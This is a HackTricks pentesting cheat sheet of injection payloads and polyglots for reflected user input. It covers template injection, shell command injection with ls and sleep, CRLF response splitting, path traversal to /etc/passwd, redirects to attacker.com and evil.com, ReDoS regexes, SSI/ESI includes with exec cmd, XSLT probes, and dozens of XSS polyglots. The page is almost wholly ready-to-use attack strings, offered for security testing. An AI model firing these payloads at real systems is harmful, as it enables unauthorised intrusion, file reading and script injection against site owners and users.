HackTricks
Search…
Pentesting
Powered By GitBook
Reflecting Techniques - PoCs and Polygloths CheatSheet
The goal of these PoCs and Polygloths is to give the tester a fast summary of vulnerabilities he may exploit if his input is somehow being reflected in the response.
This cheatsheet doesn't propose a comprehensive list of tests for each vulnerability, juts some basic ones. If you are looking for more comprehensive tests, access each vulnerability proposed.
You won't find Content-Type dependant injections like XXE, as usually you will try those yourself if you find a request sending xml data. You won't also find database injections here as even if some content might be reflected it depends heavily on the backend DB technology and structure.

Polygloths list

1
{{7*7}}[7*7]
2
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
3
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
4
%0d%0aLocation:%20http://attacker.com
5
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
6
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
7
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
8
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
9
/etc/passwd
10
../../../../../../etc/hosts
11
..\..\..\..\..\..\etc/hosts
12
/etc/hostname
13
../../../../../../etc/hosts
14
C:/windows/system32/drivers/etc/hosts
15
../../../../../../windows/system32/drivers/etc/hosts
16
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
17
http://asdasdasdasd.burpcollab.com/mal.php
18
\\asdasdasdasd.burpcollab.com/mal.php
19
www.whitelisted.com
20
www.whitelisted.com.evil.com
21
https://google.com
22
//google.com
23
javascript:alert(1)
24
(\\w*)+$
25
([a-zA-Z]+)*$
26
((a+)+)+$
27
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
28
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
29
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
30
" onclick=alert() a="
31
'"><img src=x onerror=alert(1) />
32
javascript:alert()
33
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
34
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
35
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
36
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
37
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Copied!

Basic Tests

1
{{7*7}}
2
[7*7]
Copied!

Polygloths

1
{{7*7}}[7*7]
Copied!

Basic Tests

1
;ls
2
||ls;
3
|ls;
4
&&ls;
5
&ls;
6
%0Als
7
`ls`
8
$(ls)
Copied!

Polygloths

1
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
2
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
Copied!

CRLF

Basic Tests

1
%0d%0aLocation:%20http://attacker.com
2
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
3
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
4
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
Copied!

Dangling Markup

Basic Tests

1
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
Copied!

Basic Tests

1
/etc/passwd
2
../../../../../../etc/hosts
3
..\..\..\..\..\..\etc/hosts
4
/etc/hostname
5
../../../../../../etc/hosts
6
C:/windows/system32/drivers/etc/hosts
7
../../../../../../windows/system32/drivers/etc/hosts
8
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
9
http://asdasdasdasd.burpcollab.com/mal.php
10
\\asdasdasdasd.burpcollab.com/mal.php
Copied!

Basic Tests

1
www.whitelisted.com
2
www.whitelisted.com.evil.com
3
https://google.com
4
//google.com
5
javascript:alert(1)
Copied!

ReDoS

Basic Tests

1
(\\w*)+$
2
([a-zA-Z]+)*$
3
((a+)+)+$
Copied!

Basic Tests

1
<!--#echo var="DATE_LOCAL" -->
2
<!--#exec cmd="ls" -->
3
<esi:include src=http://attacker.com/>
4
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Copied!

Polygloths

1
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Copied!
The same tests used for Open Redirect can be used here.

Basic Tests

1
${{<%[%'"}}%\
2
{{7*7}}
3
${7*7}
4
<%= 7*7 %>
5
${{7*7}}
6
#{7*7}
Copied!

Polygloths

1
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
Copied!

Basic Tests

1
<xsl:value-of select="system-property('xsl:version')" />
2
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
Copied!

Polygloths

1
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
Copied!

XSS

Basic Tests

1
" onclick=alert() a="
2
'"><img src=x onerror=alert(1) />
3
javascript:alert()
Copied!

Polygloths

1
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
2
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
3
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
4
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
5
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
6
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
7
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
8
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
9
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
10
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
11
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
12
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
13
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
14
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
15
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
16
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
17
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
18
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
19
<svg%0Ao%00nload=%09((pro\u006dpt))()//
20
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
21
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
22
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
23
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
24
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
25
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
Copied!
Last modified 3mo ago